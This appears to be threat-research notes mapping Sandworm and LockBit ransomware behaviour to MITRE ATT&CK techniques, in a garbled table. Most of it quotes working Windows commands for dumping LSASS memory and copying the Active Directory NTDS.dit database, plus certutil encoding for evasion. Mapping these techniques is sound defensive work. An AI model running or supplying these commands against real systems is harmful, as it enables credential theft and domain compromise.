Here's a table summarizing the key MITRE ATT&CK TTPs for the Sandworm Team and LockBit, associated with ransomware attacks:

Pre-ransomware activities

Prior to deploying ransomware

RemoteExec – a commercially available tool for agentless remote code execution
Impacket WMIexec – an open-source script-based solution for remote code execution
winPEAS – an open-source collection of scripts to perform privilege escalation on Windows
comsvcs.dll – used to dump the memory of the LSASS process and steal credentials
ntdsutil.exe – used to back up the Active Directory database, likely for later use credentials

https://github.com/cdong1012/Rust-Ransomware

Sandworm Team TTPs	Source	Commands
Spearphishing Attachment (T1566.001)	https://filesec.io/#

‣ | ‣ | | Drive-by Compromise (T1189) | ‣ | ‣ | | Command and Scripting Interpreter (T1059) | Prestige can use PowerShell for payload execution on targeted systems | [T1059: Command & Scripting Interpreter](https://cmndcntrl.notion.site/T1059-Command-Scripting-Interpreter-34523300a9e448b29d1887e3db8103f3) | | ‣ | https://lolbas-project.github.io/lolbas/Binaries/Schtasks/

certutil -encode inputFileName encodedOutputFileName

Usecase: Encode files to evade defensive measures Privileges required: User OS: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 MITRE ATT&CK®: T1027: Obfuscated Files or Information | | Rootkit (T1014) | | | | Credential Dumping (T1003) | https://lolbas-project.github.io/#t1003

| diskshadow.exe /s c:\\test\\diskshadow.txt

Dump Dump process by PID and create a dump file (Creates files called minidump_<PID>.dmp and results_<PID>.hlk).

rdrleakdiag.exe /p 940 /o c:\\evil /fullmemdmp /wait 1

Usecase: Dump process by PID. Privileges required: User OS: Windows MITRE ATT&CK®: T1003: OS Credential Dumping

Dump LSASS process by PID and create a dump file (Creates files called minidump_<PID>.dmp and results_<PID>.hlk).

rdrleakdiag.exe /p 832 /o c:\\evil /fullmemdmp /wait 1

Usecase: Dump LSASS process. Privileges required: Administrator OS: Windows MITRE ATT&CK®: T1003.001: LSASS Memory

After dumping a process using /wait 1, subsequent dumps must use /snap (Creates files called minidump_<PID>.dmp and results_<PID>.hlk).

rdrleakdiag.exe /p 832 /o c:\\evil /fullmemdmp /snap

Usecase: Dump LSASS process mutliple times. Privileges required: Administrator OS: Windows MITRE ATT&CK®: T1003.001: LSASS Memory

.. /ntdsutil.exe

ntdsutil.exe "ac i ntds" "ifm" "create full c:\\" q q

Dump Creates a memory dump of the LSASS process.

dump64.exe <pid> out.dmp

Usecase: Create memory dump and parse it offline to retrieve credentials. Privileges required: Administrator OS: Windows 10, Windows 11 MITRE ATT&CK®: T1003.001: LSASS Memory

Dump dsdbutil supports VSS snapshot creation

dsdbutil.exe "activate instance ntds" "snapshot" "create" "quit" "quit"

Usecase: Snapshoting of Active Directory NTDS.dit database Privileges required: Administrator OS: Windows Server 2012, Windows Server 2016, Windows Server 2019 MITRE ATT&CK®: T1003.003: NTDS

Mounting the snapshot with its GUID

dsdbutil.exe "activate instance ntds" "snapshot" "mount {GUID}" "quit" "quit"

Usecase: Mounting the snapshot to access the ntds.dit with copy c:\[Snap Volume]\windows\ntds\ntds.dit c:\users\administrator\desktop\ntds.dit.bak Privileges required: Administrator OS: Windows Server 2012, Windows Server 2016, Windows Server 2019 MITRE ATT&CK®: T1003.003: NTDS

Deletes the mount of the snapshot

dsdbutil.exe "activate instance ntds" "snapshot" "delete {GUID}" "quit" "quit"

Usecase: Deletes the snapshot Privileges required: Administrator OS: Windows Server 2012, Windows Server 2016, Windows Server 2019 MITRE ATT&CK®: T1003.003: NTDS

Mounting with snapshot identifier

dsdbutil.exe "activate instance ntds" "snapshot" "create" "list all" "mount 1" "quit" "quit"

Usecase: Mounting the snapshot identifier 1 and accessing it with with copy c:\[Snap Volume]\windows\ntds\ntds.dit c:\users\administrator\desktop\ntds.dit.bak Privileges required: Administrator OS: Windows Server 2012, Windows Server 2016, Windows Server 2019 MITRE ATT&CK®: T1003.003: NTDS

Deletes the mount of the snapshot

dsdbutil.exe "activate instance ntds" "snapshot" "list all" "delete 1" "quit" "quit"

Usecase: deletes the snapshot Privileges required: Administrator OS: Windows Server 2012, Windows Server 2016, Windows Server 2019 MITRE ATT&CK®: T1003.003: NTDS

Dump Dump process by PID and create a minidump file. If "-f dump.dmp" is not specified, the file is created as

'%TEMP%\\dump.%p.dmp' where %p is the PID of the target process. createdump.exe -n -f dump.dmp [PID]

Usecase: Dump process memory contents using PID. Privileges required: SYSTEM OS: Windows 10, Windows 11 MITRE ATT&CK®: T1003: OS Credential Dumping

Dump Creates a memory dump of the lsass process

adplus.exe -hang -pn lsass.exe -o c:\\users\\mr.d0x\\output\\folder -quiet

Usecase: Create memory dump and parse it offline Privileges required: SYSTEM OS: All Windows MITRE ATT&CK®: T1003.001: LSASS Memory

Dump process memory using adplus config file (see Resources section for a sample file).

adplus.exe -c config-adplus.xml

Usecase: Run commands under a trusted Microsoft signed binary Privileges required: SYSTEM OS: All Windows MITRE ATT&CK®: T1003.001: LSASS Memory

Dump Calls the MiniDump exported function of comsvcs.dll, which in turns calls MiniDumpWriteDump.

rundll32 C:\\windows\\system32\\comsvcs.dll MiniDump [LSASS_PID] dump.bin full

Usecase: Dump Lsass.exe process memory to retrieve credentials. Privileges required: SYSTEM OS: Windows 10, Windows 11 MITRE ATT&CK®: T1003.001: LSASS Memory | | System Network Configuration Discovery (T1016) | | | | Pass the Hash (T1550.002) | | | | Data Encrypted for Impact (T1486) | https://attack.mitre.org/techniques/T1486/

https://attack.mitre.org/software/S1058/

https://bazaar.abuse.ch/browse.php?search=tag%3Aprestige | Prestige has leveraged the CryptoPP C++ library to encrypt files on target systems using AES and appended filenames with .enc.[1] |

Cybersecurity Incident & Vulnerability Response Playbooks